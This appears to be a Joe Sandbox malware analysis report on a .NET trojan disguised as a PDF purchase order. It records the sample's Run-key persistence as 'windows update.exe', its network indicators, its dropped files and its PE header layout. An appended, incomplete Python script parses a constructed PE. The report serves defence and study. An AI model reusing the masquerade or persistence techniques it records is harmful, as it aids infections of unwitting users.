https://entityframework-extensions.net/md5-exception | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bulk-operations.net | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dapper-plus.net#Oops | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/14436606/23354 | Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://dapper-plus.net/getting-started-mapping#instance-context-mapping. | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-netJ | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://dapper-plus.net/pricing. | Order88983273293729387293828PDF.exe | false | Avira URL Cloud: safe | unknown
https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyEThe | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/ | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-net | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://entityframework-extensions.net/) | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft. | InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.zzzprojects.com | Order88983273293729387293828PDF.exe | false | Avira URL Cloud: safe | unknown
https://bulk-operations.net/pricing. | Order88983273293729387293828PDF.exe | false | Avira URL Cloud: safe | unknown
https://www.oleonidas.gr | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://entityframework-extensions.net/include-graph). | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://entityframework-extensions.net/pricing. | Order88983273293729387293828PDF.exe | false | Avira URL Cloud: safe | unknown
https://dapper-plus.net/getting-started-mapping#instance-context-mapping | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://linqtosql-plus.net/pricing. | Order88983273293729387293828PDF.exe | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-neti | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://entityframework-extensions.net/md5-exceptionX | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/11564914/23354; | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://entityframework-plus.net/ | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215 | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354sCannot | Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://ipwho.is/ | Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dapper-plus.net | Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.78.221.73 | oleonidas.gr | Greece | | 47521 | IPHOSTGRIpDomainGR | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1557778
                                                Start date and time:2024-11-18 16:22:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 6m 50s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Order88983273293729387293828PDF.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@10/6@1/1
                                                EGA Information:
                                                • Successful, ratio: 40%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 188
                                                • Number of non-executed functions: 14
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target windows update.exe, PID 1360 because it is empty
                                                • Execution Graph export aborted for target windows update.exe, PID 4308 because it is empty
                                                • Execution Graph export aborted for target windows update.exe, PID 7100 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Order88983273293729387293828PDF.exe
Time | Type | Description
10:23:05 | API Interceptor | 63x Sleep call for process: Order88983273293729387293828PDF.exe modified
16:23:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
16:23:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.78.221.73 | Order88983273293729387293828PDF.exe | Get hash | malicious | Quasar | Browse |
| e-dekont (72).pdf(#U007e56 KB).exe | Get hash | malicious | Snake Keylogger | Browse |
| DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe | Get hash | malicious | DarkCloud | Browse |
| RFQ 4748.exe | Get hash | malicious | Snake Keylogger | Browse |
| PurchOrd_75238572.pdf.exe | Get hash | malicious | Snake Keylogger | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
IPHOSTGRIpDomainGR | Order88983273293729387293828PDF.exe | Get hash | malicious | Quasar | Browse | 185.78.221.73
| e-dekont (72).pdf(#U007e56 KB).exe | Get hash | malicious | Snake Keylogger | Browse | 185.78.221.73
| DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe | Get hash | malicious | DarkCloud | Browse | 185.78.221.73
| RFQ 4748.exe | Get hash | malicious | Snake Keylogger | Browse | 185.78.221.73
| PurchOrd_75238572.pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 185.78.221.73
| 433.docx.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse | 185.78.220.138
| https://ktima-edem.gr/gbzuv/?09812432 | Get hash | malicious | Unknown | Browse | 93.174.123.195
| https://andronikidis.gr/3nxw1/?31759481 | Get hash | malicious | Unknown | Browse | 93.174.123.207
| Prices_Required.exe | Get hash | malicious | DarkCloud | Browse | 185.78.220.151
| pw5tgKfhDO.elf | Get hash | malicious | Mirai | Browse | 185.78.220.47
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854 | Get hash | malicious | Unknown | Browse | 185.78.221.73
| https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.com | Get hash | malicious | Unknown | Browse | 185.78.221.73
| https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ== | Get hash | malicious | Unknown | Browse | 185.78.221.73
| Fac.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 185.78.221.73
| phish_alert_sp1_1.0.0.0(1).eml | Get hash | malicious | KnowBe4 | Browse | 185.78.221.73
| voi.bat | Get hash | malicious | Unknown | Browse | 185.78.221.73
| bPRQRIfbbq.exe | Get hash | malicious | Unknown | Browse | 185.78.221.73
| New Order Data sheet Page.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 185.78.221.73
| http://dailyfragrancedeals.com | Get hash | malicious | Unknown | Browse | 185.78.221.73
| bPRQRIfbbq.exe | Get hash | malicious | Unknown | Browse | 185.78.221.73
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Roaming\SubDir\windows update.exe | Factura modificada____678979879.exe | Get hash | malicious | DarkCloud | Browse |
| Lista de cotizaciones.exe | Get hash | malicious | DarkCloud | Browse |
| ORDER REF_47806798 .exe | Get hash | malicious | XWorm | Browse |
| chiara.exe | Get hash | malicious | CryptOne, DarkTortilla, Mofksys, XWorm | Browse |
| Bank Details.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| Signed Document..exe | Get hash | malicious | Remcos, DarkTortilla, PureLog Stealer | Browse |
| PO CONTRACT.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| image.exe | Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ABA NEW ORDER No.2400228341.pdf.exe | Get hash | malicious | AsyncRAT | Browse |
| 09099627362726.exe | Get hash | malicious | AgentTesla | Browse |
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1119
                                                                              Entropy (8bit):5.345080863654519
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0Hj
                                                                              MD5:E6726BABA80C39624BADA32F0CCE6B54
                                                                              SHA1:4C769FA8A02DBE33AA9084040A9E6C70230334FA
                                                                              SHA-256:6A9F9C628B47AFC2A34A71826450A12D9293709BF977E72C04102F9DDD3705E0
                                                                              SHA-512:BBCCE0FCC59D29116253E71ECC786B8E3BA19D9A3124F36FEC9963C7F47016F145C76C18C5AD0FB6186ADEA69652BA99F29EF5AB5E71EFDD7EC07A82BB366960
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              File Type:CSV text
                                                                              Category:modified
                                                                              Size (bytes):1089
                                                                              Entropy (8bit):5.3331074454898735
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
                                                                              MD5:E54FE55F93C5501D5C4737CCF0E6E48B
                                                                              SHA1:BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
                                                                              SHA-256:2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
                                                                              SHA-512:5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):42064
                                                                              Entropy (8bit):6.19564898727408
                                                                              Encrypted:false
                                                                              SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                                              MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                                              SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                                              SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
• Filename: Factura modificada____678979879.exe, Detection: malicious
• Filename: Lista de cotizaciones.exe, Detection: malicious
• Filename: ORDER REF_47806798 .exe, Detection: malicious
• Filename: chiara.exe, Detection: malicious
• Filename: Bank Details.exe, Detection: malicious
• Filename: Signed Document..exe, Detection: malicious
• Filename: PO CONTRACT.exe, Detection: malicious
• Filename: image.exe, Detection: malicious
• Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious
• Filename: 09099627362726.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                                              Process:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2017
                                                                              Entropy (8bit):4.659840607039457
                                                                              Encrypted:false
                                                                              SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                                                              MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                                                              SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                                                              SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                                                              SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                                                              Malicious:false
                                                                              Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.909823975017993
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Order88983273293729387293828PDF.exe
                                                                              File size:1'484'800 bytes
                                                                              MD5:9c23449ea828b1d7d4473aa70f86caa8
                                                                              SHA1:474136c0e6d3d7c00a2e4f1b1e41f831fbb6dcba
                                                                              SHA256:7c9b4c774fbf907cf1858ea31454992e16d6b6521f880fcd8a12433ce25b6b35
                                                                              SHA512:843a03c44436410ae67a56ca00e4f3c19461979f4211b848eadf0ca02641ec3ee13a38f38e03bc316e028aceaa7571e41d1163e7d0933fe0e12d28ea1fae0925
                                                                              SSDEEP:12288:Er0K/EsBQT93xj6mZw7Y/zLZefq5U6t1uxSxwOz7MIAvKcz9eoJEtww2LOB:ES3V1w8kzSGOzwFV93O
                                                                              TLSH:98653B0523A8A635D5BE4B366EF20C1487B3F24793E1EB9A4EC8B8E954537647D0C363
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g................................. ........@.. ....................................`................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x56bd1e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673B1492 [Mon Nov 18 10:18:58 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line repeated 97 times)
The six-byte jmp is the entire native entry stub. 00402000h is the image base (0x400000) plus the IAT directory RVA (0x2000); that IAT is 8 bytes, one thunk plus the null terminator, and holds the single import mscoree.dll!_CorExeMain. The entrypoint RVA 0x16bd1e (0x56bd1e - 0x400000) plus 6 equals 0x16bd24, the end of the .text virtual size, so everything after the stub is the section's zero file-alignment padding, which the disassembler renders as add byte ptr [eax], al.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x16bccc         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x16c000         0x600         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x16e000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x169d24      0x169e00  2bcc95b1031270eb64fa80708b0db782  False     0.3340369980569948  data       5.9126749216074055   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x16c000         0x600         0x600     e5e88fec0e419a3145f0150cf93f440f  False     0.419921875         data       4.11655846446106     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x16e000         0xc           0x200     ceb03a5f00f1c1b196e29cef5ebb3862  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x16c0a0  0x32c  data                                                                                                  0.4248768472906404
RT_MANIFEST  0x16c3cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain
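The static header fields above describe the standard shape of a 32-bit .NET executable: a COM descriptor (CLR header) directory, a one-slot IAT at 0x2000 importing only mscoree.dll!_CorExeMain, and an entrypoint that is nothing but `jmp dword ptr [00402000h]` through that slot. The script below is an added example (not part of the Joe Sandbox report or of the sample) that checks exactly this relationship: it parses the PE32 header, maps the entrypoint RVA to a file offset, confirms the stub is an `FF 25` indirect jump, and confirms the jump target lies inside the IAT directory. The image base and directory RVAs are copied from the report; the byte image it runs on, the `.text` layout and `ENTRY_RVA` are constructed stand-ins so the check runs offline.

```python
import struct

# Values copied from the report's static info. Everything else (the in-memory
# image, ENTRY_RVA, the section layout) is constructed for this example; the
# real sample's entrypoint is 0x56bd1e, i.e. RVA 0x16bd1e.
IMAGE_BASE = 0x400000
TEXT_RVA = 0x2000
IAT_RVA, IAT_SIZE = 0x2000, 0x8            # IMAGE_DIRECTORY_ENTRY_IAT
COM_RVA, COM_SIZE = 0x2008, 0x48           # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
ENTRY_RVA = 0x2050                         # assumed position of the stub in the constructed image
FILE_ALIGN = 0x200
DIR_IAT, DIR_COM = 12, 14                  # data-directory indices from the PE specification


def build_constructed_pe() -> bytes:
    """Assemble a minimal PE32 whose .text holds an IAT slot and a CLR-style entry stub (test input)."""
    text = bytearray(FILE_ALIGN)
    # IAT at RVA 0x2000: one thunk (dummy value standing in for mscoree!_CorExeMain) plus terminator.
    struct.pack_into("<II", text, IAT_RVA - TEXT_RVA, 0x2100, 0)
    # Entry stub: FF 25 imm32  ==  jmp dword ptr [IMAGE_BASE + IAT_RVA]  ==  jmp dword ptr [00402000h]
    struct.pack_into("<BBI", text, ENTRY_RVA - TEXT_RVA, 0xFF, 0x25, IMAGE_BASE + IAT_RVA)

    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
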